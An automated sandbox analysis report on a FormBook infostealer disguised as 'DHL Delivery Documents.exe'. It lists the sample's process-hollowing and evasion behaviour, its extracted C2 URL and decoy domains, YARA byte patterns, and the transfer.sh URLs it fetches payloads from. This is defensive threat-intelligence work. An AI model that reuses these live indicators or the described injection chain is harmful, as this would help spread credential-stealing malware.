Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL Delivery Documents.exe

Overview

General Information

Sample Name:DHL Delivery Documents.exe
Analysis ID:562120
MD5:5bc8492c9f262d1f9840635b87edf9c5
SHA1:da867a8b837e43c91414ff46d239ab95b799d04b
SHA256:7a4424af54555e5a81f6fa4e2b2c42c6d19c71bbcc261cd1be14af245c3b711c
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious aspnet_compiler.exe Execution
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • DHL Delivery Documents.exe (PID: 4592 cmdline: "C:\Users\user\Desktop\DHL Delivery Documents.exe" MD5: 5BC8492C9F262D1F9840635B87EDF9C5)
    • aspnet_compiler.exe (PID: 5360 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 6760 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 5848 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.trabaho-academy.net/zqzw/"], "decoy": ["laurentmathieu.com", "nohohonndana.com", "hhmc.info", "shophallows.com", "blazebunk.com", "goodbridge.xyz", "flakycloud.com", "bakermckenziegroups.com", "formation-adistance.com", "lovingearthbotanicals.com", "tbrservice.plus", "heritagehousehotels.com", "drwbuildersco.com", "lacsghb.com", "wain3x.com", "dadreview.club", "continiutycp.com", "cockgirls.com", "48mpt.xyz", "033skz.xyz", "gmconstructionlnc.com", "ms-mint.com", "aenrione.xyz", "honxuan.com", "snowmanvila.com", "cig-online.com", "valetvolley.com", "bjsnft.com", "bennystrom.com", "flw.ink", "clarissagrandiart.com", "samfamstudio.com", "pamschams.com", "edgar-regale.com", "combi-tech.tech", "00xwq.online", "eclipseconstrucciones.com", "plick-click.com", "dive.education", "regenelis.com", "blue-chipwordtoscan-today.info", "xn--rsso51aevf65u.com", "maonagrana.com", "lucasdebatintrader.com", "cassijohnson.com", "roeten.online", "into-concrete.xyz", "motovip.store", "floryfab.com", "slkykq.com", "vidyakala.com", "stairwaystowealth.com", "meganandbobbyprine.com", "arestradings.com", "emilyschlueter.com", "platanin.com", "hnhstudios.com", "dmembutidos.com", "dcassorealtor.com", "megamobil.wien", "001skz.xyz", "5t45urfgurkhgbvkhbuh.com", "a3hd.com", "newmexicotruckwrecklawyers.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.0.aspnet_compiler.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.0.aspnet_compiler.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.0.aspnet_compiler.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        7.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.2.aspnet_compiler.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 16 entries

          Sigma Overview

          System Summary

          barindex
          Source: Process startedAuthor: frack113: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL Delivery Documents.exe" , ParentImage: C:\Users\user\Desktop\DHL Delivery Documents.exe, ParentProcessId: 4592, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 5360
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 6760

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.trabaho-academy.net/zqzw/"], "decoy": ["laurentmathieu.com", "nohohonndana.com", "hhmc.info", "shophallows.com", "blazebunk.com", "goodbridge.xyz", "flakycloud.com", "bakermckenziegroups.com", "formation-adistance.com", "lovingearthbotanicals.com", "tbrservice.plus", "heritagehousehotels.com", "drwbuildersco.com", "lacsghb.com", "wain3x.com", "dadreview.club", "continiutycp.com", "cockgirls.com", "48mpt.xyz", "033skz.xyz", "gmconstructionlnc.com", "ms-mint.com", "aenrione.xyz", "honxuan.com", "snowmanvila.com", "cig-online.com", "valetvolley.com", "bjsnft.com", "bennystrom.com", "flw.ink", "clarissagrandiart.com", "samfamstudio.com", "pamschams.com", "edgar-regale.com", "combi-tech.tech", "00xwq.online", "eclipseconstrucciones.com", "plick-click.com", "dive.education", "regenelis.com", "blue-chipwordtoscan-today.info", "xn--rsso51aevf65u.com", "maonagrana.com", "lucasdebatintrader.com", "cassijohnson.com", "roeten.online", "into-concrete.xyz", "motovip.store", "floryfab.com", "slkykq.com", "vidyakala.com", "stairwaystowealth.com", "meganandbobbyprine.com", "arestradings.com", "emilyschlueter.com", "platanin.com", "hnhstudios.com", "dmembutidos.com", "dcassorealtor.com", "megamobil.wien", "001skz.xyz", "5t45urfgurkhgbvkhbuh.com", "a3hd.com", "newmexicotruckwrecklawyers.com"]}
          Multi AV Scanner detection for submitted file
          Source: DHL Delivery Documents.exeVirustotal: Detection: 30%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: www.trabaho-academy.net/zqzw/Avira URL Cloud: Label: malware
          Machine Learning detection for sample
          Source: DHL Delivery Documents.exeJoe Sandbox ML: detected
          Source: 7.0.aspnet_compiler.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.aspnet_compiler.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.aspnet_compiler.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.aspnet_compiler.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49751 version: TLS 1.0
          Source: DHL Delivery Documents.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: aspnet_compiler.exe, 00000007.00000002.358011544.0000000002FC0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: BNCXGAS.pdb source: DHL Delivery Documents.exe
          Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000007.00000002.356998480.00000000014EF000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000003.296854295.00000000010A0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.357056996.0000000005120000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: .pdbBSJB source: DHL Delivery Documents.exe, 00000002.00000002.297160400.0000000001350000.00000004.08000000.00040000.00000000.sdmp, DHL Delivery Documents.exe, 00000002.00000002.297652300.0000000003B63000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000007.00000002.356998480.00000000014EF000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000003.296854295.00000000010A0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, msdt.exe, 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.357056996.0000000005120000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: aspnet_compiler.pdb source: msdt.exe, 0000000C.00000002.620930532.0000000005987000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 0000000C.00000002.596381462.0000000003775000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msdt.pdb source: aspnet_compiler.exe, 00000007.00000002.358011544.0000000002FC0000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi

          Networking

          barindex
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.trabaho-academy.net/zqzw/
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: global trafficHTTP traffic detected: GET /get/mVKia7/BINCC.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /get/KkxDr1/bbbbbbbbbbb.txt HTTP/1.1Host: transfer.sh
          Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
          Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49751 version: TLS 1.0
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: DHL Delivery Documents.exe, 00000002.00000002.297310779.000000000146A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: DHL Delivery Documents.exe, 00000002.00000002.300447432.000000001E2C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microf
          Source: DHL Delivery Documents.exe, 00000002.00000002.300447432.000000001E2C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros.
          Source: DHL Delivery Documents.exe, 00000002.00000002.297376238.0000000003AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: DHL Delivery Documents.exe, 00000002.00000002.300447432.000000001E2C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
          Source: DHL Delivery Documents.exe, 00000002.00000002.297376238.0000000003AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh
          Source: DHL Delivery Documents.exeString found in binary or memory: https://transfer.sh/get/KkxDr1/bbbbbbbbbbb.txt
          Source: DHL Delivery Documents.exeString found in binary or memory: https://transfer.sh/get/KkxDr1/bbbbbbbbbbb.txt9BNCXGAS.Properties.ResourcesL
          Source: DHL Delivery Documents.exe, 00000002.00000002.297598334.0000000003B1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/KkxDr1/bbbbbbbbbbb.txtx
          Source: DHL Delivery Documents.exeString found in binary or memory: https://transfer.sh/get/mVKia7/BINCC.txt
          Source: unknownDNS traffic detected: queries for: transfer.sh
          Source: global trafficHTTP traffic detected: GET /get/mVKia7/BINCC.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /get/KkxDr1/bbbbbbbbbbb.txt HTTP/1.1Host: transfer.sh

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: DHL Delivery Documents.exe
          Executable has a suspicious name (potential lure to open the executable)
          Source: DHL Delivery Documents.exeStatic file information: Suspicious name
